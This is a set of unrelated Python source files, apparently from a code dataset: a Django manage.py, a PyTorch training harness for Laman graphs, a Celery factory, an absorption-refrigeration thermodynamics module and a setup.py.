worker = worker_registry_instance.worker_retrieve(
worker_id,
req_id
)
logger.info("\n Worker retrieve response : {}\n".format(
json.dumps(worker, indent=4)
))
worker_obj.load_worker(
worker
)
logger.info("**********Worker details Updated with Worker ID" +
"*********\n%s\n", worker_id)
def main(args=None):
"""Entry point function."""
parse_command_line(args)
initialize_logging(config)
initialize_tcf(config)
# Open GUI
gui_main()
# -----------------------------------------------------------------------------
main()
|
py | 1a307088777aa0e35f95b844b6e96a4fe7c6fc1e | #!/usr/bin/env python
# Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "myoauth.settings")
from django.core.management import execute_from_command_line
execute_from_command_line(sys.argv)
|
py | 1a30713242f679d0cf9a3f0fa4790f66a85e40ac | import numpy as np
import collections
import numbers
import torch
import os
from . import joint_network
from .summary import LamanClassificationSummary
from .. import corruption_dataset, model as mo
from .representation import graph_to_rep, combine_graph_reps, encode_action, LamanRep, get_action_offsets
from ..molecule_models import _train_utils, _train_harness
from ._utils import cast_numpy_rec
def _transform(graph, act):
graph_rep = graph_to_rep(graph)
act_encoded = encode_action(act, graph)
act_coarse = act.action_type
offset = torch.from_numpy(get_action_offsets(graph)).int()
return {
'graph': graph_rep,
'label': act_encoded,
'label_coarse': act_coarse,
'label_offset': offset
}
def _collate(batch):
graph = combine_graph_reps([b['graph'] for b in batch])
graph = cast_numpy_rec(graph)
label_fine = torch.LongTensor([b['label'] for b in batch])
label_coarse = torch.LongTensor([b['label_coarse'] for b in batch])
offsets = torch.stack([b['label_offset'] for b in batch])
return {'graph': graph, 'label': label_fine, 'label_coarse': label_coarse, 'label_offset': offsets}
def make_dataloader(dataset, batch_size=128, num_workers=2):
return torch.utils.data.DataLoader(
dataset, batch_size, shuffle=True, collate_fn=_collate,
pin_memory=True, num_workers=num_workers)
class LamanJointHarness(_train_harness.TrainingHarness):
_keys = ['label', 'label_offset']
def __init__(self, model, optimizer, summary, task='train', profile=False):
super(LamanJointHarness, self).__init__(model, optimizer, summary, task=task, profile=profile)
def get_model_input(self, batch):
graph = LamanRep.from_sequence(batch['graph'])
return graph,
def get_loss(self, model_output, batch):
loss, summary_info = mo.classification.multi_classification_coarse_to_fine_loss(
model_output, batch['label_coarse'], batch['label'], summary_info=True)
self.summary.record_marginal_probability(
torch.nn.functional.softmax(summary_info['coarse_logit'].detach(), dim=1).mean(dim=0))
return loss
def record_step_summary(self, batch, model_output):
logits_and_scopes = model_output
prediction, label, label_offset = _train_harness.compute_and_aggregate_predictions(
logits_and_scopes, batch, self._keys)
if self.summary:
self.summary.record_statistics(prediction, label, label_offset)
def main(parameters=None):
if parameters is None:
parameters = {}
task = parameters.get('task', 'train')
batch_size = parameters.get('batch_size', 256)
dataset_path = parameters.get('dataset_path')
if dataset_path is None:
dataset_path = '../data/laman/low_decomp_dataset_sample.pkl'
dataset = corruption_dataset.LamanCorruptionDataset(dataset_path, transform=_transform)
dataloader = make_dataloader(dataset, batch_size, num_workers=parameters.get('num_workers', 2))
config = joint_network.JointClassificationNetworkConfig(
5, message_size=256)
model = joint_network.JointClassificationNetwork(config)
if 'model_path' in parameters and parameters['model_path'] is not None:
model.load_state_dict(torch.load(parameters['model_path'], map_location='cpu'))
model = model.cuda()
if task != 'train':
model = model.eval()
if task == 'train':
optimizer, schedulers = _train_utils.init_optimizer(model, parameters)
else:
optimizer = None
schedulers = []
summary = LamanClassificationSummary()
harness = LamanJointHarness(model, optimizer, summary, task)
harness.hooks.extend([
_train_harness.LogLossTimeHook(batch_size),
_train_harness.PrintAccuracyHook(summary, None)
])
savedir = _train_utils.get_save_dir(parameters)
for epoch in range(30):
dataset.set_epoch(epoch)
harness.set_epoch(epoch)
if task == 'train':
for scheduler in schedulers:
scheduler.step()
harness.train_epoch(dataloader)
if task == 'train':
torch.save(
model.state_dict(),
os.path.join(savedir, 'laman_joint_ep_{0}.pth'.format(epoch)))
if __name__ == '__main__':
args = _train_utils.parse_arguments()
main(vars(args))
|
py | 1a30713db64a02d79f6d119907494d1b00e0c519 | from celery import Celery
def make_celery(app):
celery = Celery(
app.import_name,
broker=app.config.get('CELERY_BROKER_URL', 'redis://localhost:6379')
)
celery.conf.update(app.config)
TaskBase = celery.Task
class ContextTask(TaskBase):
abstract = True
def __call__(self, *args, **kwargs):
with app.app_context():
return TaskBase.__call__(self, *args, **kwargs)
celery.Task = ContextTask
return celery
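# Example usage (sketch; the Flask app and task names below are illustrative):
#     from flask import Flask
#     flask_app = Flask(__name__)
#     celery = make_celery(flask_app)
#
#     @celery.task()
#     def add_together(a, b):
#         return a + b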
|
py | 1a3071793dfa4b9b377970acbccf3fd7b1f75ffd | import numpy as np
import matplotlib.pyplot as plt
from sympy import solve, Eq, symbols
import sys
import pandas
import math
import os
def degradeCOP(Tevap, Tcond, Qall, S):
degraded = ((Tevap * Tcond)/(Tcond - Tevap)) * (S/Qall)
return degraded
# This function calculates the reversible COP of an ES refrigerator based on thermal reservoirs
def reversibleCOP(Tevap, Tcond, Tgen):
revCOP = (((Tgen - Tcond)/(Tgen))/((Tcond-Tevap)/Tevap))
return revCOP
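# Worked example (illustrative temperatures in kelvin; the 400 K generator temperature is an assumed value):
#     reversibleCOP(Tevap=266, Tcond=325, Tgen=400)
#     = ((400 - 325) / 400) / ((325 - 266) / 266)
#     = 0.1875 / 0.2218 ~= 0.845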
# This function solves the system of equations to calculate the mass flowrates of
# the combined absorber-evaporator system
def massabsorberevaporator(m6, m4, xa4, ya3, xa6):
m3, m5= symbols(['m3', 'm5'])
system = [
#Eq((xa4*m4)+ (ya3 * m3) - (0 * m5) - (xa6 * m6), 0),
Eq(m5 - (1-ya3)*m3,0),
Eq(m4 + m3 - m5 - m6, 0),
#Eq((1-ya3)*m3-m5, 0)
#Eq(m4 - (ya3*m3) - (m5) + (ya3 * m6), 0)
]
soln = solve(system, [m4, m3, m5, m6])
return float(m4), float(soln[m3]), float(soln[m5]), float(m6)
# This is an interpolate helper function to be used in other functions.
# targetcomp refers to ammonia composition. All CSV files are in ammonia composition.
def interpolateAW(targetcomp, T, var):
# must use the entropy-ammonia-water csv, entropy-ammonia-butane csv, or enthalpy-ammonia-water csv
script_dir = os.path.dirname(__file__) #<-- absolute dir the script is in
rel_path = 'data/mixed/'
abs_file_path = os.path.join(script_dir, rel_path)
colnames = ['pressure', 'ammoniacomp', 'prop']
propertyname = ''
    if var == 1:
propertyname = 'enthalpy'
else:
propertyname = 'entropy'
filename = propertyname + '-kjmol-' + str(T) + 'K-ammoniawater'
data = pandas.read_csv(str(abs_file_path) + '%s.csv' %filename, names=colnames)
ammoniacomp = data.ammoniacomp.tolist()
prop = data.prop.tolist()
lower = prop[int(math.floor(targetcomp /0.05))]
higher = prop[(int((math.floor(targetcomp /0.05))+1))]
theta = (targetcomp - int(math.floor(targetcomp /0.05))*0.05 ) / ((int((math.floor(targetcomp /0.05))+1))*0.05 - int(math.floor(targetcomp /0.05))*0.05 )
return (theta * higher) + (1-theta)*lower
def interpolateAB(targetcomp, T, var):
# must use the entropy-ammonia-water csv, entropy-ammonia-butane csv, or enthalpy-ammonia-water csv
script_dir = os.path.dirname(__file__) #<-- absolute dir the script is in
rel_path = 'data/mixed/'
abs_file_path = os.path.join(script_dir, rel_path)
colnames = ['pressure', 'ammoniacomp', 'prop']
propertyname = ''
    if var == 1:
propertyname = 'enthalpy'
else:
propertyname = 'entropy'
filename = propertyname + '-kjmol-' + str(T) + 'K-ammoniabutane'
data = pandas.read_csv(str(abs_file_path) + '%s.csv' %filename, names=colnames)
ammoniacomp = data.ammoniacomp.tolist()
prop = data.prop.tolist()
lower = prop[int(math.floor(targetcomp /0.05))]
higher = prop[(int((math.floor(targetcomp /0.05))+1))]
theta = (targetcomp - int(math.floor(targetcomp /0.05))*0.05 ) / ((int((math.floor(targetcomp /0.05))+1))*0.05 - int(math.floor(targetcomp /0.05))*0.05 )
return (theta * higher) + (1-theta)*lower
# This calculates the two mass flowrates and the compositions coming out of the flash drum
# given a mass flowrate and composition of ammonia coming in
# inputcomp is the ammonia composition
# temp is the temperature that the flash drum flashes at
def leverrule(inputflow, temp, inputcomp):
#t-xy of ammonia-water
#input composition of ammonia
script_dir = os.path.dirname(__file__) #<-- absolute dir the script is in
rel_path = "data/txy/"
abs_file_path = os.path.join(script_dir, rel_path)
colnames = ['pressure', 'ammoniacomp', 'temperature', 'vaporwater', 'vaporammonia', 'liquidwater', 'liquidammonia']
filename = 'txy-ammonia-4bar'
data = pandas.read_csv( str(abs_file_path) + '%s.csv' %filename, names = colnames)
ammoniacomp = data.ammoniacomp.tolist()
temperature = data.temperature.tolist()
vaporammonia = data.vaporammonia.tolist()
liquidammonia = data.liquidammonia.tolist()
index, valuetemp = min(enumerate(temperature), key=lambda x: abs(x[1]-temp))
liquiddistance = inputcomp - liquidammonia[index]
vapordistance = vaporammonia[index] - inputcomp
vaporflow = symbols('vaporflow')
system = [
Eq((vapordistance * vaporflow) + (-1.0*liquiddistance*(float(inputflow) - vaporflow)), 0)
]
soln = solve(system, [vaporflow])
# the order is: vapor flow, liquid flow, liquid ammonia composition. vapor ammonia composition
return soln[vaporflow], (inputflow - soln[vaporflow]) ,liquidammonia[index], vaporammonia[index]
# This calculates the Q of the generator
# compin is the ammonia composition
def Qgenerator(massin, compin, Tgen):
massout = massin
enthalpyin = interpolateAW(compin, 325, 1 )
enthalpyout = interpolateAW(compin, Tgen, 1)
Qgen = -1*(massin*enthalpyin - massout*enthalpyout)
return Qgen
# This calculates the S of the flash
# compin is the ammonia flash
def Sgenerator(massin, compin, Qgen, Tgen):
massout = massin
entropyin = interpolateAW(compin, 325, 2)
#RAHUL fixed Line 95 - wrong entropy values read in
entropyout = interpolateAW(compin, Tgen, 2)
Sgen = symbols('Sgen')
system = Eq((-1 * massin * entropyin ) + (massout*entropyout) + (Qgen/Tgen) - Sgen, 0)
soln = solve([system], Sgen)
return soln[Sgen]
def Qflash(massin, massvapor, massliquid, compin, vaporammonia, liquidammonia, Tgen):
enthalpyin = interpolateAW( compin, Tgen, 1)
enthalpyoutvapor = interpolateAW(vaporammonia, Tgen, 1)
enthalpyoutliquid = interpolateAW( liquidammonia, Tgen, 1)
Qflash = symbols('Qflash')
system = Eq(( massin* enthalpyin ) + (-1* massvapor*enthalpyoutvapor) + (-1* massliquid*enthalpyoutliquid) + Qflash, 0)
soln = solve([system], [Qflash])
return soln[Qflash]
# This calculates the S of the flash
# compin is the ammonia flash
def Sflash(massin, massvapor, massliquid, compin, vaporammonia, liquidammonia, Qflash, Tgen):
entropyin = interpolateAW( compin, Tgen, 2)
entropyoutvapor = interpolateAW(vaporammonia, Tgen, 2)
entropyoutliquid = interpolateAW(liquidammonia, Tgen, 2)
Sflash = symbols('Sflash')
system = Eq(( massin* entropyin ) + (-1* massvapor*entropyoutvapor) + (-1* massliquid*entropyoutliquid) + (Sflash/Tgen) - Qflash, 0)
soln = solve([system], Sflash)
return soln[Sflash]
def Qevaporator(m2, m3, m5, ya3, ya2, xa5, Tgen):
enthalpym2 = interpolateAW(ya2, Tgen, 1)
enthalpym3 = interpolateAB( ya3, 266, 1)
#print(enthalpym3)
enthalpym5 = interpolateAB( xa5, 325, 1)
#print(enthalpym5)
# print(enthalpym2 + enthalpym3 + enthalpym5)
Qevap = symbols('Qevap')
system = Eq(( m2 * enthalpym2 ) + (-1* m3*enthalpym3) + (m5*enthalpym5) + Qevap, 0)
soln = solve([system], Qevap)
#print(type(soln))
return soln[Qevap]
def Sevaporator(m2, m3, m5, ya3, ya2, xa5, Qevap, Tgen):
entropym2 = interpolateAW(ya2, Tgen, 2)
entropym3 = interpolateAB( ya3, 266, 2)
entropym5 = interpolateAB( xa5, 325, 2)
Sevap = symbols('Sevap')
system = Eq(( m2 * entropym2 ) + (-1* m3*entropym3) + (m5*entropym5) + (Qevap/266) - Sevap, 0)
soln = solve([system], Sevap)
return soln[Sevap]
def Qabsorber(m3, m4, m5, m6, ya3, xa4, xa5, xa6, Tgen):
enthalpym3 = interpolateAB( ya3, 266, 1)
enthalpym4 = interpolateAW( xa4, Tgen, 1)
enthalpym5 = interpolateAB(xa5, 325, 1)
enthalpym6 = interpolateAW( xa6, 325, 1)
Qabs = symbols('Qabs')
system = (m3 * enthalpym3 ) + (m4 * enthalpym4) + (-1*m5 * enthalpym5) + (-1 * m6 * enthalpym6) + Qabs
soln = solve([system], Qabs)
return soln[Qabs]
def Sabsorber(m3, m4, m5, m6, ya3, xa4, xa5, xa6, Qabs, Tgen):
entropym3 = interpolateAB( ya3, 266, 2)
entropym4 = interpolateAW( xa4, Tgen, 2)
entropym5 = interpolateAB( xa5, 325, 2)
entropym6 = interpolateAW(xa6, 325, 2)
Sabs = symbols('Sabs')
system = Eq((m3*entropym3) + (m4 * entropym4) + (-1*m5 * entropym5) + (-1*m6*entropym6) + (Qabs/325)- Sabs, 0)
soln = solve([system], Sabs)
return soln[Sabs] |
py | 1a307224ae5f0e70ae470da0a1bec456b3c60633 | from setuptools import setup, find_packages
import versioneer
setup(
name="pylammpsmpi",
version=versioneer.get_version(),
description="Parallel Lammps Python interface",
url='https://github.com/pyiron/pylammpsmpi',
author='Jan Janssen',
author_email='[email protected]',
license='BSD',
classifiers=['Development Status :: 5 - Production/Stable',
'Topic :: Scientific/Engineering :: Physics',
'License :: OSI Approved :: BSD License',
'Intended Audience :: Science/Research',
'Operating System :: OS Independent',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3.8',
'Programming Language :: Python :: 3.9'
],
keywords='lammps, mpi4py',
packages=find_packages(exclude=["*tests*"]),
install_requires=[
'mpi4py==3.1.3'
],
cmdclass=versioneer.get_cmdclass(),
)
|